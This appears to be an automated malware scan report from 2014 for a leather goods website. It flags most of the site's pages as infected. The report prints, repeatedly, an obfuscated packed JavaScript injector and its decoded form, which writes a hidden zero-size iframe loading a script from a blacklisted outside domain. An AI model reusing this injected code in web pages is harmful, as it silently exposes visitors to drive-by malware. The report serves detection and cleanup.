Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=macclayleather.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://macclayleather.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:59:12 GMT Location: http://www.macclayleather.com/ Server: Apache Content-Length: 306 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.macclayleather.com/ | 200 OK Content-Length: 13383 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/js/jquery-1.4.3.min.js | 200 OK Content-Length: 77746 Content-Type: application/x-javascript | clean |
http://macclayleather.com/js/jquery.cycle.all.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:59:15 GMT Location: http://www.macclayleather.com/js/jquery.cycle.all.js Server: Apache Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.macclayleather.com/js/jquery.cycle.all.js | 200 OK Content-Length: 42919 Content-Type: application/x-javascript | clean |
http://macclayleather.com/js/jquery.cookie.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:59:17 GMT Location: http://www.macclayleather.com/js/jquery.cookie.min.js Server: Apache Content-Length: 329 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.macclayleather.com/js/jquery.cookie.min.js | 200 OK Content-Length: 1213 Content-Type: application/x-javascript | clean |
http://macclayleather.com/js/jquery.accordion.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:59:18 GMT Location: http://www.macclayleather.com/js/jquery.accordion.js Server: Apache Content-Length: 328 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.macclayleather.com/js/jquery.accordion.js | 200 OK Content-Length: 6212 Content-Type: application/x-javascript | clean |
http://macclayleather.com/index.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 17 Dec 2014 19:59:19 GMT Location: http://www.macclayleather.com/index.html Server: Apache Content-Length: 316 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.macclayleather.com/index.html | 200 OK Content-Length: 13383 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/bags.html | 200 OK Content-Length: 41050 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/js/jquery.prettyPhoto.js | 200 OK Content-Length: 35317 Content-Type: application/x-javascript | clean |
http://www.macclayleather.com/belts.html | 200 OK Content-Length: 18674 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/briefcases.html | 200 OK Content-Length: 20982 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/caps.html | 200 OK Content-Length: 18772 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/cases.html | 200 OK Content-Length: 21725 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/cwallets.html | 200 OK Content-Length: 17450 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/purse.html | 200 OK Content-Length: 15535 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> | ||
http://www.macclayleather.com/game.html | 200 OK Content-Length: 24144 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: zadofadsun.info eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'|var|write|document|k02|k0|1000|k22|k01|if|k2|setTimeout|src|http||board|height|zadofadsun|width|info||php|tag20|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://zadofadsun.info/tag20.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://zadofadsun.info/tag20.php"></ifee> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: macclayleather.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Dec 2014 19:59:12 GMT
Location: http://www.macclayleather.com/
Server: Apache
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
...306 bytes of data.
GET / HTTP/1.1
Host: macclayleather.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Wed, 17 Dec 2014 19:59:12 GMT
Location: http://www.macclayleather.com/
Server: Apache
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
...306 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: macclayleather.com
Referer: http://www.google.com/search?q=macclayleather.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: macclayleather.com
Referer: http://www.google.com/search?q=macclayleather.com
Result:
The result is similar to the first query. There are no suspicious redirects found.